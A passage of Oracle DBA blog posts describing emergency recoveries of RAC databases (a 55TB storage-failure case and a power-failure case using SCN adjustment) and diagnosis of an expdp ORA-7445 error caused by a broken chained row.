Keep in mind that although the database is open, plenty of cleanup work remains. For instance, dbv found corrupt blocks in undo, so the undo tablespace had to be rebuilt; the alert log also needs to be checked for any accompanying errors.
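For reference, a hedged sketch of such a dbv check against an ASM-resident file (the path and credentials are placeholders; the userid parameter is what lets dbv read files stored inside ASM):

$ dbv file=+DATA/xxxx/datafile/undotbs01.dbf userid=system/oracle blocksize=8192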

Secondly, for a database that has been forced open, we recommend running the MOS scripts to check the data dictionary for inconsistencies. If the dictionary is clearly damaged, the database usually has to be rebuilt via a logical export; otherwise a rebuild is generally unnecessary.

As for whether a rebuild is mandatory, I do not think there is a hard rule. To be safe it is usually recommended, and it is also worth considering when the database is small; otherwise, if the alert log stays clean and the database runs for a while without further anomalies, you can quite reasonably skip the rebuild.


A 55TB Oracle RAC (ASM) recovery case


A few days ago a customer database failed and needed our emergency support. Getting a feel for the environment gave me quite a start: around 55TB of data. First, let's look at the failure information:

 

Fri Mar 25 22:57:10 2016
Errors in file /oracle/app/oracle/diag/rdbms/njsdb/njsdb1/trace/xxxx1_dia0_30474350.trc  (incident=640081):
ORA-32701: Possible hangs up to hang ID=80 detected
Incident details in: /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/incident/incdir_640081/xxxx1_dia0_30474350_i640081.trc
DIA0 requesting termination of session sid:10347 with serial # 16419 (ospid:29884706) on instance 2
    due to a LOCAL, HIGH confidence hang with ID=80.
    Hang Resolution Reason: Although the number of affected sessions did not
    justify automatic hang resolution initially, this previously ignored
    hang was automatically resolved.
DIA0: Examine the alert log on instance 2 for session termination status of hang with ID=80.
Fri Mar 25 22:59:26 2016
minact-scn: useg scan erroring out with error e:12751
Suspending MMON action 'Block Cleanout Optim, Undo Segment Scan' for 82800 seconds
Fri Mar 25 22:59:35 2016
Sweep [inc][640081]: completed
Sweep [inc2][640081]: completed
Fri Mar 25 22:59:57 2016
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_dbw7_27263388.trc:
ORA-27063: number of bytes read/written is incorrect
IBM AIX RISC System/6000 Error: 78: Connection timed out
Additional information: -1
Additional information: 8192
WARNING: Write Failed. group:3 disk:35 AU:241007 offset:262144 size:8192
Fri Mar 25 22:59:57 2016
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_ora_10289540.trc:
ORA-27072: File I/O error
IBM AIX RISC System/6000 Error: 78: Connection timed out
Additional information: 7
Additional information: 41229344
Additional information: -1
WARNING: Read Failed. group:3 disk:35 AU:20131 offset:540672 size:8192
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_dbw7_27263388.trc:
ORA-27063: number of bytes read/written is incorrect
IBM AIX RISC System/6000 Error: 78: Connection timed out
Additional information: -1
Additional information: 8192
WARNING: Write Failed. group:3 disk:35 AU:241007 offset:237568 size:8192
Fri Mar 25 22:59:57 2016
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_dbw3_30212292.trc:
ORA-27063: number of bytes read/written is incorrect
IBM AIX RISC System/6000 Error: 78: Connection timed out
Additional information: -1
Additional information: 8192
。。。。。。
WARNING: failed to write mirror side 1 of virtual extent 5096 logical extent 0 of file 583 in group 3 on disk 35 allocation unit 241007
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_dbw3_30212292.trc:
ORA-27063: number of bytes read/written is incorrect
IBM AIX RISC System/6000 Error: 78: Connection timed out
Additional information: -1
Additional information: 8192
。。。。。。
ORA-15080: synchronous I/O operation to a disk failed
WARNING: failed to write mirror side 1 of virtual extent 5096 logical extent 0 of file 583 in group 3 on disk 35 allocation unit 241007
WARNING: failed to write mirror side 1 of virtual extent 5002 logical extent 0 of file 585 in group 3 on disk 35 allocation unit 242538
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_dbw3_30212292.trc:
ORA-15080: synchronous I/O operation to a disk failed

From the log above we can see that this node started reporting errors at 22:57 on the 25th: at first some sessions appear to have hung, and then write failures followed, the failed writes all being against disk 35.

Of course these are only warnings, so at this point we cannot yet tell whether the disk itself is faulty.

We later learned from the customer that the storage links had indeed gone abnormal at the time, causing database I/O errors, which matches the symptoms above.

Next, let's look at what operations the customer performed afterwards.

 

Sat Mar 26 01:13:51 2016
ALTER DATABASE OPEN
This instance was first to open
Abort recovery for domain 0
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_ora_27853116.trc:
ORA-01113: file 763 needs media recovery
ORA-01110: data file 763: '+DATA/xxxx/datafile/ts_icp_bill.1028.881083603'
ORA-1113 signalled during: ALTER DATABASE OPEN...
Sat Mar 26 01:14:14 2016
......
......
Sat Mar 26 02:02:14 2016
ALTER DATABASE RECOVER  database
Media Recovery Start
 started logmerger process
Sat Mar 26 02:02:18 2016
WARNING! Recovering data file 763 from a fuzzy backup. It might be an online
backup taken without entering the begin backup command.
。。。。。
WARNING! Recovering data file 779 from a fuzzy backup. It might be an online
backup taken without entering the begin backup command.
Sat Mar 26 02:02:18 2016
。。。。。。
Sat Mar 26 02:04:15 2016
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_pr00_36110522.trc:
ORA-01547: warning: RECOVER succeeded but OPEN RESETLOGS would get error below
ORA-01194: file 1 needs more recovery to be consistent
ORA-01110: data file 1: '+DATA/xxxx/datafile/system.261.880958693'
Slave exiting with ORA-1547 exception
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_pr00_36110522.trc:
ORA-01547: warning: RECOVER succeeded but OPEN RESETLOGS would get error below
ORA-01194: file 1 needs more recovery to be consistent
ORA-01110: data file 1: '+DATA/xxxx/datafile/system.261.880958693'
ORA-1547 signalled during: alter database recover cancel...
Sat Mar 26 02:04:43 2016

 

We can see the customer issued a normal alter database open, and Oracle reported that some files needed media recovery. Running recover database then warned that some files might come from a fuzzy backup.

What does that mean? Simply that the checkpoints of these files are very old and they need redo from long ago in order to recover.

Since this is a noarchivelog database, the redo these problem files need has very likely been overwritten already.

Comparing SCNs confirmed that the redo they require is indeed gone. A reminder here: do not draw conclusions from the alert log alone.

Judging only by the alert log you might think just a few files were affected. My next thought was: if only a few files are bad, why not skip them and recover the rest? That would recover as much data as possible.

So I ran the following command:

 

run {
set until scn 14586918070973;
recover database skip forever tablespace ts_icp_bill,ts_icp_bill_idx,ts_wj_bill,ts_wj_bill_idx,ts_js_bill;
}

That command is actually rather lethal, because Oracle will offline drop every datafile in the skipped tablespaces.

So, in hindsight, the approach above was somewhat ill-advised.

Comparing the datafile SCNs against the SCN information in v$log further showed that as many as 605 files probably needed recovery, out of roughly 2000 datafiles in the whole database.

Based on a rough SCN cut-off I then generated two scripts to perform file-level recovery, roughly as follows:

spool recover1.sh
set pagesize 160 heading off feedback off long 9999
-- xxx is the SCN cut-off determined from the comparison above
select 'recover datafile '||file#||';' from v$datafile_header where checkpoint_change# < xxx;
spool off

 

After recovering all the files that could be recovered normally, I tried opening the database, and to my surprise it opened. Some people might have stopped there, but that is not the end of it.

Think about it: even though the database is open, some of the 605 datafiles we could not properly recover may still be in RECOVER status, i.e. not yet online.

In that state the business cannot access them. In fact, a quick check showed that about 540 files were still in RECOVER status, so we still had to find a way to bring them online.

The fix itself is not hard: a simple bbed edit of the checkpoint information in each datafile header would do. But there were 540 files, all of them in ASM.

You can imagine the amount of work that would involve. Instead, I generated another script (sketched below), started the database in mount state and onlined all the files that had been in RECOVER status.
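A minimal sketch of generating that script (assuming the files to fix are exactly those reported as RECOVER in v$datafile; the spool file name is illustrative):

SQL> set pagesize 0 heading off feedback off
SQL> spool online_files.sql
SQL> select 'alter database datafile '||file#||' online;' from v$datafile where status='RECOVER';
SQL> spool off
SQL> @online_files.sql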

Then I ran recover database using backup controlfile, followed directly by alter database open resetlogs.

Unfortunately the database did not open straight away; it threw an error that is quite common (MOS has notes on it) and is probably related to temp.

[Screenshot of that error is not preserved.]

At this point I simply dropped the tempfiles, recreated the control file once more, ran another recover, and the database then opened directly.

Checking the alert log, I found one more error still being reported:

 

Recovery of Online Redo Log: Thread 1 Group 1 Seq 1 Reading mem 0
  Mem# 0: +DATA/xxxx/onlinelog/group_1.2177.907527869
  Mem# 1: +FRA/xxxx/onlinelog/group_1.263.907527881
Block recovery completed at rba 1.46.16, scn 3396.1209160607
ORACLE Instance xxxx1 (pid = 26) - Error 607 encountered while recovering transaction (12, 33) on object 143154.
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_smon_10289168.trc:
ORA-00607: Internal error occurred while making a change to a data block
ORA-00600: internal error code, arguments: [6856], [0], [1], [], [], [], [], [], [], [], [], []
Sat Mar 26 19:05:43 2016
Dumping diagnostic data in directory=[cdmp_20160326190543], requested by (instance=1, osid=10289168 (SMON)), summary=[incident=2400209].
Starting background process QMNC
Sat Mar 26 19:05:44 2016
QMNC started with pid=40, OS id=17432578
LOGSTDBY: Validating controlfile with logical metadata
LOGSTDBY: Validation complete
Sat Mar 26 19:05:45 2016
Sweep [inc][2400209]: completed
Sweep [inc2][2400209]: completed
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_smon_10289168.trc  (incident=2400210):
ORA-00600: internal error code, arguments: [6856], [0], [13], [], [], [], [], [], [], [], [], []
Incident details in: /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/incident/incdir_2400210/xxxx1_smon_10289168_i2400210.trc
Dumping diagnostic data in directory=[cdmp_20160326190545], requested by (instance=1, osid=10289168 (SMON)), summary=[abnormal process termination].
Starting background process CJQ0
Sat Mar 26 19:05:46 2016
CJQ0 started with pid=43, OS id=11010116
Sat Mar 26 19:05:47 2016
db_recovery_file_dest_size of 2047887 MB is 0.21% used. This is a
user-specified limit on the amount of space that will be used by this
database for recovery-related files, and does not reflect the amount of
space available in the underlying filesystem or ASM diskgroup.
Use ADRCI or Support Workbench to package the incident.
See Note 411.1 at My Oracle Support for error and packaging details.
Block recovery from logseq 1, block 60 to scn 14586918097855
Recovery of Online Redo Log: Thread 1 Group 1 Seq 1 Reading mem 0
  Mem# 0: +DATA/xxxx/onlinelog/group_1.2177.907527869
  Mem# 1: +FRA/xxxx/onlinelog/group_1.263.907527881
Dumping diagnostic data in directory=[cdmp_20160326190547], requested by (instance=1, osid=10289168 (SMON)), summary=[incident=2400210].
Block recovery completed at rba 1.91.16, scn 3396.1209160640
ORACLE Instance xxxx1 (pid = 26) - Error 607 encountered while recovering transaction (15, 3) on object 143247.
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_smon_10289168.trc:
ORA-00607: Internal error occurred while making a change to a data block
ORA-00600: internal error code, arguments: [6856], [0], [13], [], [], [], [], [], [], [], [], []
Starting background process SMCO
Dumping diagnostic data in directory=[cdmp_20160326190549], requested by (instance=1, osid=10289168 (SMON)), summary=[abnormal process termination].
Sat Mar 26 19:05:49 2016
SMCO started with pid=46, OS id=2949376
Setting Resource Manager plan SCHEDULER[0x3198]:DEFAULT_MAINTENANCE_PLAN via scheduler window
Setting Resource Manager plan DEFAULT_MAINTENANCE_PLAN via parameter
Sat Mar 26 19:05:49 2016

 

Clearly, these errors mean that SMON found two transactions it could not recover while doing transaction rollback.

Seeing them, some might suspect corrupted undo is preventing the transaction recovery. That is not the case here; dbv showed the undo files were all intact.

Either way, fixing this is relatively simple: identify the objects involved and rebuild them.
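The object IDs are right there in the alert log (143154 and 143247), so identifying them is a one-line query; a sketch:

SQL> select owner, object_name, object_type
  2    from dba_objects
  3   where object_id in (143154, 143247);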


An 11gR2 RAC recovery case worked over the Qingming holiday


This is an emergency data recovery case from a customer that came in yesterday, over the holiday. In short, a power failure had left the database unable to open. Initial checks confirmed the database is Oracle 11.2.0.3 (Linux RAC) and fairly small, around 200G. The recovery looked very smooth at first (the database was open within about 30 minutes), but quite a few pitfalls showed up afterwards. Here is a quick write-up of this Qingming-holiday recovery case.

First, let's look at the error the database reported when it failed to open.

 

Sun Apr 03 20:55:36 2016
SMON: enabling cache recovery
ORA-01555 caused by SQL statement below (SQL ID: 4krwuz0ctqxdt, SCN: 0x0000.5edc85a7):
select ctime, mtime, stime from obj$ where obj# = :1
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl1/trace/orcl1_ora_19990.trc:
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00604: error occurred at recursive SQL level 1
ORA-01555: snapshot too old: rollback segment number 29 with name "_SYSSMU29_3872709797$" too small
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl1/trace/orcl1_ora_19990.trc:
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00604: error occurred at recursive SQL level 1
ORA-01555: snapshot too old: rollback segment number 29 with name "_SYSSMU29_3872709797$" too small
Error 704 happened during db open, shutting down database
USER (ospid: 19990): terminating the instance due to error 704
Instance terminated by USER, pid = 19990
ORA-1092 signalled during: alter database open...
opiodr aborting process unknown ospid (19990) as a result of ORA-1092

This error is very common and I have run into it many times; handling it is not hard, and there are roughly two approaches:
1. Use a 10046 trace to locate the problematic blocks and manually clear the offending transactions;

2. Push the database SCN forward.
Here I chose to push the SCN forward.
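For approach 2, a hedged sketch of how the poke target is usually located: oradebug dumpvar prints the SGA address range of kcsgscn_, the variable holding the current SCN, and oradebug poke then writes a larger value there. The address and value shown are the ones that appear in the transcript further down and are of course instance-specific.

SQL> oradebug setmypid
SQL> oradebug dumpvar sga kcsgscn_
SQL> oradebug poke 0x060019598 4 0x832B8852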

I modified the SCN directly with oradebug poke. The first poke probably did not raise the SCN enough; the error stayed the same. On the second attempt the error changed into one we know much better:

 

Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl1/trace/orcl1_ora_23188.trc  (incident=2108431):
ORA-00600: internal error code, arguments: [2662], [0], [2200563965], [0], [2200568242], [20971648], [], [], [], [], [], []
Incident details in: /u01/app/oracle/diag/rdbms/orcl/orcl1/incident/incdir_2108431/orcl1_ora_23188_i2108431.trc
Sun Apr 03 21:09:46 2016
Dumping diagnostic data in directory=[cdmp_20160403210946], requested by (instance=1, osid=23188), summary=[incident=2108431].
Sun Apr 03 21:09:46 2016
Use ADRCI or Support Workbench to package the incident.
See Note 411.1 at My Oracle Support for error and packaging details.
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl1/trace/orcl1_ora_23188.trc:
ORA-00600: internal error code, arguments: [2662], [0], [2200563965], [0], [2200568242], [20971648], [], [], [], [], [], []
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl1/trace/orcl1_ora_23188.trc:
ORA-00600: internal error code, arguments: [2662], [0], [2200563965], [0], [2200568242], [20971648], [], [], [], [], [], []
Error 600 happened during db open, shutting down database
USER (ospid: 23188): terminating the instance due to error 600

There are also two ways to deal with this error, roughly:
1. Since the SCN gap is very small, simply push the SCN forward a little further.

2. Use bbed to patch the transaction in the block at DBA 20971648 and bypass the error.

Obviously option 1 is simpler, so I poked the SCN once more, increasing it a little, and the database opened without difficulty.

 

SQL> startup mount pfile='/tmp/pfile.ora';
ORACLE instance started.

Total System Global Area 2.0243E+10 bytes
Fixed Size		    2237088 bytes
Variable Size		 7449087328 bytes
Database Buffers	 1.2751E+10 bytes
Redo Buffers		   41189376 bytes
Database mounted.
SQL> oradebug setmypid
Statement processed.
SQL> alter system set job_queue_processes=0;

System altered.

SQL> oradebug poke 0x060019598  4 0x832B8852
BEFORE: [060019598, 06001959C) = 00000000
AFTER:	[060019598, 06001959C) = 832B8852
SQL> alter database open;

Database altered.

SQL>

The whole recovery looked simple: the database was open in under half an hour. But when I checked the datafile status, the database had 23 datafiles in total and 11 of them showed as MISSING, which means they could not be identified at all. In fact the alert log was reporting the following at the time, telling us these datafiles could not be recognised:

 

Sun Apr 03 21:26:09 2016
minact-scn: Inst 1 is now the master inc#:2 mmon proc-id:24523 status:0x7
minact-scn status: grec-scn:0x0000.00000000 gmin-scn:0x0000.00000000 gcalc-scn:0x0000.00000000
[24583] Successfully onlined Undo Tablespace 2.
Undo initialization finished serial:0 start:123081664 end:123083044 diff:1380 (13 seconds)
Dictionary check beginning
Tablespace 'NORMING_DATA' #10 found in data dictionary,
but not in the controlfile. Adding to controlfile.
Tablespace 'NORMING_TEMP' #11 found in data dictionary,
but not in the controlfile. Adding to controlfile.
Tablespace 'NORMINGTEST_TEMP' #12 found in data dictionary,
but not in the controlfile. Adding to controlfile.
Tablespace 'NORMINGTEST_DATA' #13 found in data dictionary,
but not in the controlfile. Adding to controlfile.
Tablespace 'NORMINGLJ_TEMP' #14 found in data dictionary,
but not in the controlfile. Adding to controlfile.
Tablespace 'NORMINGLJ_DATA' #15 found in data dictionary,
but not in the controlfile. Adding to controlfile.
Tablespace 'TABLESPACE_XYZH' #16 found in data dictionary,
but not in the controlfile. Adding to controlfile.
File #13 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00013' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #14 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00014' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #15 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00015' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #16 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00016' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #17 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00017' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #18 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00018' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #19 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00019' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #20 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00020' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #21 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00021' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #22 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00022' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #23 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00023' in the controlfile.
This file can no longer be recovered so it must be dropped.
Dictionary check complete

Since the database was now open, I generated a control file re-creation script, and its contents looked like this:

 

STARTUP NOMOUNT
CREATE CONTROLFILE REUSE DATABASE "ORCL" RESETLOGS  ARCHIVELOG
    MAXLOGFILES 192
    MAXLOGMEMBERS 3
    MAXDATAFILES 1024
    MAXINSTANCES 32
    MAXLOGHISTORY 9344
LOGFILE
  GROUP 1 '+DATA/orcl/onlinelog/group_1.273.850670135'  SIZE 50M BLOCKSIZE 512,
  GROUP 2 '+DATA/orcl/onlinelog/group_2.274.850670135'  SIZE 50M BLOCKSIZE 512
-- STANDBY LOGFILE
DATAFILE
  '+DATA/orcl/datafile/system.268.850670033',
  '+DATA/orcl/datafile/sysaux.269.850670033',
  '+DATA/orcl/datafile/undotbs1.270.850670033',
  '+DATA/orcl/datafile/users.271.850670033',
  '+DATA/orcl/datafile/undotbs2.276.850670237',
  '+DATA/orcl/datafile/datacenter',
  '+DATA/orcl/datafile/partner_platform',
  '+DATA/orcl/datafile/sw_portal',
  '+DATA/orcl/datafile/system.dbf',
  '+DATA/orcl/datafile/system_02.dbf',
  '+DATA/orcl/datafile/user_02.dbf',
  '+DATA/orcl/datafile/user_03.dbf',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00013',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00014',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00015',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00016',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00017',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00018',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00019',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00020',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00021',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00022',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00023'
CHARACTER SET ZHS16GBK;

When I asked the customer, they explained that the control file had been corrupted earlier, so they had already recreated it themselves, run several rounds of recovery, and performed a resetlogs.

From the information above it is easy to see that the customer missed 11 datafiles when they recreated the control file. Because those files are still recorded in the data dictionary, Oracle automatically offline drops them at open time.
Some might say: just locate the files and recreate the control file again. True, but in practice it was not that simple.
Browsing the ASM diskgroup I found several oddly named files (user_02.dbf, for example, actually linked to a SYSTEM file), and more cases like it. It is very easy to get this wrong; the correct approach is to query dba_data_files and confirm the datafiles one by one.
After pinning down the 4 files that had been missed inside the ASM diskgroup, another 7 turned out to sit on the filesystem. When all of them were added to the creation script, it became clear that their resetlogs information no longer matched the rest of the database, so creating the control file would simply fail with ORA-01189.
That meant the resetlogs information in these 11 datafile headers had to be patched by hand; once that was done, the control file could be created successfully.
But the subsequent recover then asked for earlier archivelogs, and further checking showed the archived logs had all been deleted.
So, finally, the checkpoint information of these datafiles also had to be patched to match the other, healthy files, after which the database finally opened,

and a check confirmed that every database file was back in ONLINE status.

Finally, the files that were sitting on the filesystem were migrated into the ASM diskgroup, the redo logs were added back, and RAC node 2 was started.
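As an aside, the file-by-file confirmation against the dictionary mentioned above boils down to a query like this (a sketch):

SQL> select file_id, file_name, online_status
  2    from dba_data_files
  3   order by file_id;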


Digging into an expdp ORA-7445 error


A customer reported that after an abnormal shutdown and restart of a database, data exports started failing: expdp would error out and exit immediately:

Processing object type SCHEMA_EXPORT/JOB
. . exported "STATS"."T_REPORT_MONTH_TEMPS"              988.2 MB 1292221 rows
ORA-39014: One or more workers have prematurely exited.
ORA-39029: worker 1 with process name "DW01" prematurely terminated
ORA-31672: Worker process DW01 died unexpectedly.

Job "SYS"."SYS_EXPORT_SCHEMA_04" stopped due to fatal error at 23:58:10

Checking the alert log at that time showed errors like the following:

Errors in file /u01/app/oracle/admin/orcl/bdump/orcl_dw01_28608.trc:
ORA-07445: exception encountered: core dump [klufprd()+321] [SIGSEGV] [Address not mapped to object] [0x000000000] [] []

From the information above we can draw a few conclusions:

1. It is the expdp worker (write) process that fails, since the trace was produced by a DW process.

2. The DW process fails because it hits an ORA-07445 [klufprd()+321] error.

3. The function [klufprd()+321] is very rarely seen, but from the first two points we can tell it must be related to the buffer cache.
So the temporary workaround is simple: flush the cache with alter system flush buffer_cache and then run expdp again.
The customer tried this and found that, although expdp still reported errors, it no longer aborted and carried on exporting the remaining objects.

Digging further into the error produced the following clue:

*** SESSION ID:(2760.1968) 2016-04-08 00:14:14.347
            row 01808438.0 continuation at
            file# 6 block# 33784 slot 14 not found
**************************************************
KDSTABN_GET: 0 ..... ntab: 1
curSlot: 14 ..... nrows: 14
**************************************************
*** 2016-04-08 00:14:14.348
ksedmp: internal or fatal error
ORA-00600: internal error code, arguments: [kdsgrp1], [], [], [], [], [], [], []
Current SQL statement for this session:
SELECT /*+NESTED_TABLE_GET_REFS+*/ "STATS"."T_REPORT_MONTH".* FROM "STATS"."T_REPORT_MONTH"
----- Call Stack Trace -----

Clearly the table mentioned here is exactly the one expdp was choking on; after the buffer cache flush, expdp simply skipped this table and carried on exporting the other objects.
The information above shows something is wrong. The customer realised this too and checked the datafiles with dbv, but found no corruption.
Note that dbv mainly detects physical corruption and is generally powerless against logical corruption, although intra-block logical inconsistencies are something dbv can catch.
What the message tells us is that Oracle expected to find the continuation of row 01808438.0 in file 6 block 33784 but did not.
Note that file 6 block 33784 itself is intact.
So what does row 01808438.0 mean?
It is an nrid, which you can think of as a kind of pointer: the first part is an rdba address and the second part a row number.
How do we dig into why this error occurs? Simple: dump block 33784 and the block at rdba 01808438 (hex) separately. Here is the conversion script:

SQL>  SELECT dbms_utility.data_block_address_block(25199672) "BLOCK",
  2         dbms_utility.data_block_address_file(25199672) "FILE"
  3      FROM dual;

    BLOCK       FILE
---------- ----------
     33848          6

The error mentions row 01808438.0, so let's first look at the dump of file 6 block 33848:

Block header dump:  0x01808438
 Object id on Block? Y
 seg/obj: 0xc03d01  csc: 0xb37.78b5ae28  itc: 3  flg: E  typ: 1 - DATA
     brn: 0  bdba: 0x1807d8a ver: 0x01 opc: 0
     inc: 0  exflg: 0

 Itl           Xid                  Uba         Flag  Lck        Scn/Fsc
0x01   0x000a.02d.000cdc5c  0x00809c91.6507.21  --U-    2  fsc 0x0001.78b6a4b1
0x02   0x000a.014.000cdd00  0x00806957.650d.15  --U-    2  fsc 0x0000.78b6ec5d
0x03   0x000a.025.000cdd5d  0x00801e50.650f.0a  --U-    2  fsc 0x0000.78b71584

data_block_dump,data header at 0x1fb2f87c
===============
tsiz: 0x1f80
hsiz: 0x34
pbl: 0x1fb2f87c
bdba: 0x01808438
     76543210
flag=--------
ntab=1
nrow=17
frre=-1
fsbo=0x34
fseo=0xd2
avsp=0x33b
tosp=0x33c
0xe:pti[0]	nrow=17	offs=0
0x12:pri[0]	offs=0x1e34
......
0x30:pri[15]	offs=0x6e2
0x32:pri[16]	offs=0x583
block_row_dump:
tab 0, row 0, @0x1e34
tl: 332 fb: --H-F--- lb: 0x0  cc: 79
nrid:  0x018083f8.e
col  0: [ 5]  c4 04 5a 27 1b
col  1: [ 7]  47 59 30 32 30 30 31
col  2: [ 4]  c3 15 11 04
col  3: [12]  31 38 37 33 34 34 32 30 30 30 30 36
col  4: [12]  31 34 30 34 34 34 32 30 30 30 30 31
col  5: [30]
......

The dump above shows row 0 (the first row, as most of us would call it) of the block at rdba 01808438, and we can see an nrid in its row header.
An nrid is normally something you only encounter with chained or migrated rows. So why does it appear here?
Of the several kinds of row chaining, the most common is actually intra-block. A single row piece in a block can hold at most 255 columns, so when a row has more than 255 columns, Oracle splits the remaining column data into another row piece stored in the same block (or possibly in another block).
In other words, a row with more than 255 columns is split into multiple row pieces. When we read the row back, how does Oracle know the pieces form one complete row?
The answer is the nrid: Oracle chains the row pieces together through their nrids to reassemble the full row.
With that in mind, look at the error again. row 01808438.0 is row 0 of that block, and row 0's nrid points to 0x018083f8.e.
Following that pointer to row e (14) of block 0x018083f8, this is what we find:

 Object id on Block? Y
 seg/obj: 0xc03d01  csc: 0xb37.78bb5e9f  itc: 3  flg: E  typ: 1 - DATA
     brn: 0  bdba: 0x1807d8a ver: 0x01 opc: 0
     inc: 0  exflg: 0

 Itl           Xid                  Uba         Flag  Lck        Scn/Fsc
0x01   0x000a.013.000cdc01  0x01c02834.6573.33  --U-    2  fsc 0x0000.78cbf31d
0x02   0x000a.001.000cda7a  0x0080150a.64d3.21  C---    0  scn 0x0b37.78b584df
0x03   0x000a.01e.000cdade  0x00801510.64d3.13  C-U-    0  scn 0x0b37.78b99f21

data_block_dump,data header at 0x2b4fc709007c
===============
tsiz: 0x1f80
hsiz: 0x2e
pbl: 0x2b4fc709007c
bdba: 0x018083f8
     76543210
flag=--------
ntab=1
nrow=14
frre=-1
fsbo=0x2e
fseo=0x568
avsp=0x53a
tosp=0x53a
0xe:pti[0]	nrow=14	offs=0
0x12:pri[0]	offs=0x1d78
0x14:pri[1]	offs=0x1c37
......
0x2a:pri[12]	offs=0x6c2
0x2c:pri[13]	offs=0x568
block_row_dump:
tab 0, row 0, @0x1d78
tl: 520 fb: -----L-- lb: 0x0  cc: 255
......
tab 0, row 13, @0x568
tl: 346 fb: --H-F--- lb: 0x1  cc: 79
nrid:  0x018083f8.c
col  0: [ 5]  c4 04 5a 3a 0a
col  1: [ 7]  47 59 30 32 30 30 31
col  2: [ 4]  c3 15 11 04
......
col 76: [ 1]  80
col 77: [ 1]  80
col 78: [ 1]  80
end_of_block_dump
End dump data blocks tsn: 6 file#: 6 minblk 33784 maxblk 33784

As you can see, the row we are looking for simply is not there. The last entry in this block is row 13 (the 14th row), which is itself a row piece and carries an nrid of its own.
That nrid is 0x018083f8.c, pointing at row 12 (slot c) of the same block 33784, with which row 13 combines to form one complete row.
In other words, the row behind our original error should consist of two row pieces: one of them exists, and the other should have been in block 33784.
Because that row piece cannot be found, Oracle raises the error above.
When we hit this error we usually assume an index problem that a drop and rebuild will fix, but this case is special: it is the table data itself that is damaged.
Which is exactly why the customer's index rebuild also failed:

SQL> CREATE INDEX "STATS"."MONTHINDEX_STATUS2" ON "STATS"."T_REPORT_MONTH" ("TARGET_298", "UNIT_LEVEL", "TARGET_VAL", "MONTH_FLG")
  2    TABLESPACE "STATDATA" ;
CREATE INDEX "STATS"."MONTHINDEX_STATUS2" ON "STATS"."T_REPORT_MONTH" ("TARGET_298", "UNIT_LEVEL", "TARGET_VAL", "MONTH_FLG")
                                                     *
ERROR at line 1:
ORA-00600: internal error code, arguments: [kdsgrp1], [], [], [], [], [], [], []

Finally, with the full cause understood, the fix is straightforward: use a rowid-based approach to skip the one damaged row (see the sketch below), pull out the rest of the data and rebuild the table.
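A hedged sketch of that idea. The damaged row's head piece is slot 0 of file 6, block 33848, and the data object id from the dump (0xc03d01) is 12598529, so dbms_rowid can build the rowid to exclude. The new table name is illustrative, the relative file number is assumed to equal the absolute file number 6, and depending on the access path it may be necessary to pull the data out in rowid ranges around the bad row instead:

SQL> create table stats.t_report_month_fix as
  2  select * from stats.t_report_month t
  3   where t.rowid <> dbms_rowid.rowid_create(1, 12598529, 6, 33848, 0);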

Note: for more on intra-block row chaining, see my earlier article: http://www.killdb.com/2013/06/19/intra-blcok-chain.html


Insert into is very slow, why?


